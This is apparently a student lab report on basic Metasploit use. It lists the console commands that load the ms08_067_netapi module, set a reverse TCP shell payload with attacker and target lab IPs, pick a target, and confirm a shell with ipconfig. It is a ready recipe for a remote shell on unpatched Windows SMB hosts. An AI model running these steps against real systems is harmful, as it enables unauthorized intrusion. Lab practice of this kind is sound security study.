20155339 Exp5 MSF basic application

An Active Attack Practice--ms08_067 Vulnerability

  • Call the module: use exploit/windows/smb/ms08_067_netapiand see what payloads are availableshow payloads

  • Set the payload, and tcp reverse connection set payload generic/shell_reverse_tcp.
  • Set the return IP set LHOST 192.168.224.142.
  • Set the port number for the attack set LPORT 5339.
  • Set the IP of the target machine set RHOST 192.168.224.144.
  • See what types of drones are available show targets.

  • Here I choose the simplest 0 to try first set target 0.
  • Successfully attacked my target drone, using a ipconfigcommand to verify.

Guess you like

Origin http://43.154.161.224:23101/article/api/json?id=325039950&siteId=291194637